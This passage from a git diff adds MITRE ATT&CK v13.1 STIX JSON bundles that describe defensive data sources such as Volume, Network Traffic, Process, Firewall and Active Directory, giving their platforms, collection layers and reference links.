"https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Driver", + "description": "A computer program that operates or controls a particular type of device that is attached to a computer. 
Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5.json new file mode 100644 index 0000000000000000000000000000000000000000..758bdfa8ccddd4fb1943bca63ae81a9d19b9e8e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--23cc5bc1-45bf-47bf-919f-667d5f4d51c7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0034", + "external_id": "DS0034" + }, + { + "source_name": "Amazon S3", + "description": "Amazon. (n.d.). Amazon S3. Retrieved October 13, 2021.", + "url": "https://aws.amazon.com/s3/" + }, + { + "source_name": "Azure Blob Storage", + "description": "Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.", + "url": "https://azure.microsoft.com/en-us/services/storage/blobs/" + }, + { + "source_name": "Google Cloud Storage", + "description": "Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.", + "url": "https://cloud.google.com/storage" + } + ], + "modified": "2022-03-30T14:26:51.807Z", + "name": "Volume", + "description": "Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647.json new file mode 100644 index 0000000000000000000000000000000000000000..71c9e3d69b797435ff0d859b96eac75c0c294e8b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--72b6ef56-41b5-449b-8d42-a53271b189ae", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Office 365", + "SaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0025", + "external_id": "DS0025" + }, + { + "source_name": "Amazon AWS", + "description": "Amazon. (n.d.). Start Building on AWS Today. Retrieved October 13, 2021.", + "url": "https://aws.amazon.com" + }, + { + "source_name": "Azure Products", + "description": "Microsoft. (n.d.). Azure products. Retrieved October 13, 2021.", + "url": "https://azure.microsoft.com/en-us/services/" + } + ], + "modified": "2022-03-30T14:26:51.804Z", + "name": "Cloud Service", + "description": "Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon AWS)(Citation: Azure Products)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495.json new file mode 100644 index 0000000000000000000000000000000000000000..5fa1fe3a7f9ed72ad5b5d10a3ca278dcd09e80cf --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--1fb6750a-0257-41ec-91c0-b93165068b0b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:49:46.256Z", + "name": "Malware Repository", + "description": "Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_collection_layers": [ + "OSINT" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0004", + "external_id": "DS0004" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json new file mode 100644 index 0000000000000000000000000000000000000000..6120f2fcb6fbefe6694b704fe67c35d105fdc0d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--cc429039-19b2-4bcd-9bbe-d50284ad6c7f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0033", + "external_id": "DS0033" + }, + { + "source_name": "Microsoft NFS Overview", + "description": "Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Network Share", + "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json new file mode 100644 index 0000000000000000000000000000000000000000..a6e28a4fa7031ee02fc35788909d0bf23d7e31f4 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--30ef6d46-246d-421c-adf3-79c2d7ad439d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:13.356Z", + "name": "Network Traffic", + "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "ExtraHop" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0029", + "external_id": "DS0029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239.json new file mode 100644 index 0000000000000000000000000000000000000000..5c89dc49f5455444dd6230667f6512939d56e68f --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--2ad4866b-9ef7-41ca-a265-1cb764e791e6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:51:37.141Z", + "name": "Cluster", + "description": "A set of containerized computing resources that are managed together but have separate nodes to execute various tasks and/or applications(Citation: Kube Cluster Admin)(Citation: Kube Cluster Info)", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0031", + "external_id": "DS0031" + }, + { + "source_name": "Kube Cluster Admin", + "description": "kubernetes. (2021, January 16). Cluster Administration. Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/concepts/cluster-administration/" + }, + { + "source_name": "Kube Cluster Info", + "description": "kubernetes. (n.d.). cluster-info. Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cluster-info" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json new file mode 100644 index 0000000000000000000000000000000000000000..62782e4e22c95d1cd3a9745e7443893cd017498d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--c34c41df-b226-40af-ba76-a4d50eb872bb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0003", + "external_id": "DS0003" + }, + { + "source_name": "Microsoft Tasks", + "description": "Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Scheduled Job", + "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json new file mode 100644 index 0000000000000000000000000000000000000000..8b3265f07cc4e2051662dfe2e32aa020b8cc674d --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--1398b0fd-4376-4576-8904-9b82ba421935", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0001", + "external_id": "DS0001" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Firmware", + "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8.json new file mode 100644 index 0000000000000000000000000000000000000000..b7e9f5b9de8085992094a6b9eecf46914b3f50db --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--634e101c-cdfa-4cb0-a02d-5b66043c5750", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Azure AD", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0026", + "external_id": "DS0026" + }, + { + "source_name": "Microsoft AD DS Getting Started", + "description": "Foulds, I. et al. (2018, August 7). AD DS Getting Started. Retrieved September 23, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + } + ], + "modified": "2022-03-30T14:26:51.803Z", + "name": "Active Directory", + "description": "A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json new file mode 100644 index 0000000000000000000000000000000000000000..0b423254a32cff3c8ce0a1a00be02ee64ea044ad --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--07acbceb-cbf8-48f6-b7cd-134fc688e47c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0019", + "external_id": "DS0019" + }, + { + "source_name": "Microsoft Services", + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + }, + { + "source_name": "Linux Services Run Levels", + "description": "The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.", + "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + } + ], + "modified": "2022-03-30T14:26:51.807Z", + "name": "Service", + "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866.json new file mode 100644 index 0000000000000000000000000000000000000000..afbd84420cc2808e7449c99065c5dfcc0b3e4051 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--32f6c249-1436-4330-8c90-251c9d45b9b8", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_collection_layers": [ + "OSINT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0038", + "external_id": "DS0038" + } + ], + "modified": "2021-10-20T15:05:19.275Z", + "name": "Domain Name", + "description": "Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json new file mode 100644 index 0000000000000000000000000000000000000000..65fc87c26e64dd77d2a2c84e6b4d975e212af1d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--614d9e4b-9d1c-4ffe-aaaa-85b28ae9a615", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:26.515Z", + "name": "Process", + "description": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0009", + "external_id": "DS0009" + }, + { + "source_name": "Microsoft Processes and Threads", + "description": "Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b.json new file mode 100644 index 0000000000000000000000000000000000000000..3789c503ae22b55f62fd02e984d4236f1a8ce451 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--6f40cca2-3df9-4ce3-8fab-ae7773d0ae0c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0018", + "external_id": "DS0018" + }, + { + "source_name": "AWS Sec Groups VPC", + "description": "Amazon. (n.d.). Security groups for your VPC. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Firewall", + "description": "A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json new file mode 100644 index 0000000000000000000000000000000000000000..7e92e6bc810b9c6b7c61a71517695d1b0d63d155 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--b92ec823-ac91-43d9-ab53-2bf928b7f744", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0011", + "external_id": "DS0011" + }, + { + "source_name": "Microsoft LoadLibrary", + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "url": 